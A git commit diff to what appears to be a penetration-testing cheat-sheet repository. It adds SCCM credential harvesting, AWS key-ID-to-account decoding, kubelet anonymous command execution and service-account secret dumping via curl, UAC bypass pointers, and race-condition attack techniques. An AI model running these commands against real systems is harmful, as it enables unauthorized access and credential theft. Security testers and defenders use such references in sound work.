AWS Key ID + UAC + Race Condition

This commit is contained in:
Swissky 2023-10-28 17:31:59 +02:00
parent 3ad350b753
commit 07cf2831ca
6 changed files with 153 additions and 26 deletions

View File

@ -4048,6 +4048,7 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
> If you can escalate on a host that is an SCCM client, you can retrieve plaintext domain credentials.
On the machine.
* Find SCCM blob
```ps1
Get-Wmiobject -namespace "root\ccm\policy\Machine\ActualConfig" -class "CCM_NetworkAccessAccount"
@ -4065,6 +4066,12 @@ python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th
ConvertFrom-SddlString ""
```
From a remote machine.
* Using [garrettfoster13/sccmhunter](https://github.com/garrettfoster13/sccmhunter)
```ps1
python3 ./sccmhunter.py http -u "administrator" -p "P@ssw0rd" -d internal.lab -dc-ip 10.10.10.10. -auto
```
## SCCM Shares

View File

@ -247,7 +247,7 @@
### Access Key ID & Secret
> IAM uses the following prefixes to indicate what type of resource each unique ID applies to.
IAM uses the following prefixes to indicate what type of resource each unique ID applies to. The first four characters are the prefix that depends on the type of the key.
| Prefix | Resource type |
|--------------|-------------------------|
@ -264,6 +264,28 @@
| ASCA | Certificate |
| ASIA | Temporary (AWS STS) access key |
The rest of the string is Base32 encoded and can be used to recover the account id.
```py
import base64
import binascii
def AWSAccount_from_AWSKeyID(AWSKeyID):
trimmed_AWSKeyID = AWSKeyID[4:] #remove KeyID prefix
x = base64.b32decode(trimmed_AWSKeyID) #base32 decode
y = x[0:6]
z = int.from_bytes(y, byteorder='big', signed=False)
mask = int.from_bytes(binascii.unhexlify(b'7fffffffff80'), byteorder='big', signed=False)
e = (z & mask)>>7
return (e)
print ("account id:" + "{:012d}".format(AWSAccount_from_AWSKeyID("ASIAQNZGKIQY56JQ7WML")))
```
## AWS - Metadata SSRF
@ -2385,3 +2407,4 @@ aws ec2 describe-instances --filters "Name=subnet-id,Values=ID"
* [Getting started with Version 2 of AWS EC2 Instance Metadata service (IMDSv2) - Sunesh Govindaraj - Nov 25, 2019](https://blog.appsecco.com/getting-started-with-version-2-of-aws-ec2-instance-metadata-service-imdsv2-2ad03a1f3650)
* [Gaining AWS Console Access via API Keys - Ian Williams - March 18th, 2020](https://blog.netspi.com/gaining-aws-console-access-via-api-keys/)
* [AWS API calls that return credentials - kmcquade](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
* [A short note on AWS KEY ID - Tal Be'ery - Oct 27, 2023](https://medium.com/@TalBeerySec/a-short-note-on-aws-key-id-f88cc4317489)

View File

@ -1,4 +1,4 @@
# Container - Docker Pentest
# Container - Docker
> Docker is a set of platform as a service (PaaS) products that uses OS-level virtualization to deliver software in packages called containers.

View File

@ -1,10 +1,11 @@
# Container - Kubernetes Pentest
# Container - Kubernetes
> Kubernetes commonly stylized as K8s) is an open-source container orchestration system for automating software deployment, scaling, and management.
> Kubernetes, often abbreviated as K8s, is an open-source container orchestration platform designed to automate the deployment, scaling, and management of containerized applications
## Summary
- [Tools](#tools)
- [Exploits](#exploits)
- [Accessible kubelet on 10250/TCP](#accessible-kubelet-on-10250tcp)
- [Obtaining Service Account Token](#obtaining-service-account-token)
- [References](#references)
@ -22,9 +23,26 @@
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml
kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/nothing-allowed/pod/nothing-allowed-exec-pod.yaml
```
* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce)
* [serain/kubelet-anon-rce](https://github.com/serain/kubelet-anon-rce) - Executes commands in a container on a kubelet endpoint that allows anonymous authentication
* [DataDog/KubeHound](https://github.com/DataDog/KubeHound) - Kubernetes Attack Graph
```ps1
# Critical paths enumeration
kh.containers().criticalPaths().count()
kh.containers().dedup().by("name").criticalPaths().count()
kh.endpoints(EndpointExposure.ClusterIP).criticalPaths().count()
kh.endpoints(EndpointExposure.NodeIP).criticalPaths().count()
kh.endpoints(EndpointExposure.External).criticalPaths().count()
kh.services().criticalPaths().count()
## Accessible kubelet on 10250/TCP
# DNS services and port
kh.endpoints(EndpointExposure.External).criticalPaths().limit(local,1)
.dedup().valueMap("serviceDns","port")
.group().by("serviceDns").by("port")
```
## Exploits
### Accessible kubelet on 10250/TCP
Requirements:
* `--anonymous-auth`: Enables anonymous requests to the Kubelet server
@ -32,15 +50,18 @@ Requirements:
* Getting pods: `curl -ks https://worker:10250/pods`
* Run commands: `curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} -d 'input=1' -d 'output=1' -d'tty=1' -d 'command=ls' -d 'command=/'`
## Obtaining Service Account Token
### Obtaining Service Account Token
Token is stored at `/var/run/secrets/kubernetes.io/serviceaccount/token`
Use the service account token:
* on kube-apiserver API: `curl -ks -H "Authorization: Bearer <TOKEN>" https://master:6443/api/v1/namespaces/{namespace}/secrets`
* on `kube-apiserver` API: `curl -ks -H "Authorization: Bearer <TOKEN>" https://master:6443/api/v1/namespaces/{namespace}/secrets`
* with kubectl: ` kubectl --insecure-skip-tls-verify=true --server="https://master:6443" --token="<TOKEN>" get secrets --all-namespaces -o json`
## References
* [Attacking Kubernetes through Kubelet - Withsecure Labs- 11 January, 2019](https://labs.withsecure.com/publications/attacking-kubernetes-through-kubelet)
* [kubehound - Attack Reference](https://kubehound.io/reference/attacks/)
* [KubeHound: Identifying attack paths in Kubernetes clusters - Datadog - October 2, 2023](https://securitylabs.datadoghq.com/articles/kubehound-identify-kubernetes-attack-paths/)

View File

@ -3,6 +3,7 @@
## Summary
* [AppLocker](#applocker)
* [User Account Control](#user-account-control)
* [DPAPI](#dpapi)
* [Powershell](#powershell)
* [Anti Malware Scan Interface](#anti-malware-scan-interface)
@ -36,6 +37,33 @@
* [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md)
## User Account Control
UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer.
* Check if UAC is enabled
```ps1
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
```
* Check UAC level
```
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken
```
| EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description |
|---|---|---|---|
| 0 | / | / | No UAC |
| 1 | 1 | / | No UAC |
| 1 | 0 | 0 | No UAC for RID 500 |
| 1 | 0 | 1 | UAC for Everyone |
* UAC Bypass
* [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc
* [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control
## DPAPI
Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md)

View File

@ -4,12 +4,14 @@
## Summary
- [Race Condition](#race-condition)
- [Summary](#summary)
- [Tools](#tools)
- [Labs](#labs)
- [Exploit](#exploit)
- [Limit-overrun](#limit-overrun)
- [Rate-limit bypass](#rate-limit-bypass)
- [Techniques](#techniques)
- [HTTP/1.1 last-byte synchronization](#http11-last-byte-synchronization)
- [HTTP/2 Single-packet attack](#http2-single-packet-attack)
- [Turbo Intruder](#turbo-intruder)
- [Example 1](#example-1)
- [Example 2](#example-2)
@ -18,17 +20,26 @@
## Tools
* [Turbo Intruder - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.](https://github.com/PortSwigger/turbo-intruder)
* [PortSwigger/turbo-intruder](https://github.com/PortSwigger/turbo-intruder) - a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.
* [JavanXD/Raceocat](https://github.com/JavanXD/Raceocat) - Make exploiting race conditions in web applications highly efficient and ease-of-use.
## Labs
* [PortSwigger - Limit overrun race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-limit-overrun)
* [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
* [PortSwigger - Bypassing rate limits via race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-bypassing-rate-limits)
* [PortSwigger - Multi-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-multi-endpoint)
* [PortSwigger - Single-endpoint race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-single-endpoint)
* [PortSwigger - Exploiting time-sensitive vulnerabilities](https://portswigger.net/web-security/race-conditions/lab-race-conditions-exploiting-time-sensitive-vulnerabilities)
* [PortSwigger - Partial construction race conditions](https://portswigger.net/web-security/race-conditions/lab-race-conditions-partial-construction)
## Limit-overrun
## Exploit
TODO
### Limit-overrun
Overdrawing limit, multiple voting, multiple spending of a gifcard.
**Examples**:
@ -37,13 +48,48 @@ TODO
* [Register multiple users using one invitation - @franjkovic](https://hackerone.com/reports/148609)
## Rate-limit bypass
### Rate-limit bypass
TODO
Bypassing anti-bruteforce mechanism and 2FA.
**Examples**:
* []()
* [Instagram Password Reset Mechanism Race Condition - Laxman Muthiyah](https://youtu.be/4O9FjTMlHUM)
## Techniques
### HTTP/1.1 last-byte synchronization
Send every requests execpt the last byte, then "release" each request by sending the last byte.
Execute a last-byte synchronization using Turbo Intruder
```py
engine.queue(request, gate='race1')
engine.queue(request, gate='race1')
engine.openGate('race1')
```
**Examples**:
* [Cracking reCAPTCHA, Turbo Intruder style - James Kettle](https://portswigger.net/research/cracking-recaptcha-turbo-intruder-style)
### HTTP/2 Single-packet attack
In HTTP/2 you can send multiple HTTP requests concurrently over a single connection. In the single-packet attack around ~20/30 requests will be sent and they will arrive at the same time on the server. Using a single request remove the network jitter.
* [turbo-intruder/race-single-packet-attack.py](https://github.com/PortSwigger/turbo-intruder/blob/master/resources/examples/race-single-packet-attack.py)
* Burp Suite
* Send a request to Repeater
* Duplicate the request 20 times (CTRL+R)
* Create a new group and add all the requests
* Send group in parallel (single-packet attack)
**Examples**:
* [CVE-2022-4037 - Discovering a race condition vulnerability in Gitlab with the single-packet attack - James Kettle](https://youtu.be/Y0NVIVucQNE)
## Turbo Intruder
@ -115,7 +161,9 @@ def handleResponse(req, interesting):
## References
* [DEF CON 31 - Smashing the State Machine the True Potential of Web Race Conditions - James Kettle](https://youtu.be/tKJzsaB1ZvI)
* [Smashing the state machine: the true potential of web race conditions - James Kettle / @albinowax - 09 August 2023](https://portswigger.net/research/smashing-the-state-machine)
* [Turbo Intruder: Embracing the billion-request attack - James Kettle - 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon - Apr 24, 2018](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
* [Race conditions on the web - Josip Franjkovic - July 12th, 2016](https://www.josipfranjkovic.com/blog/race-conditions-on-web)
* [New techniques and tools for web race conditions - Emma Stocks - 10 August 2023](https://portswigger.net/blog/new-techniques-and-tools-for-web-race-conditions)
* [Exploiting Race Condition Vulnerabilities in Web Applications - Javan Rasokat](https://conference.hitb.org/hitbsecconf2022sin/materials/D2%20COMMSEC%20-%20Exploiting%20Race%20Condition%20Vulnerabilities%20in%20Web%20Applications%20-%20Javan%20Rasokat.pdf)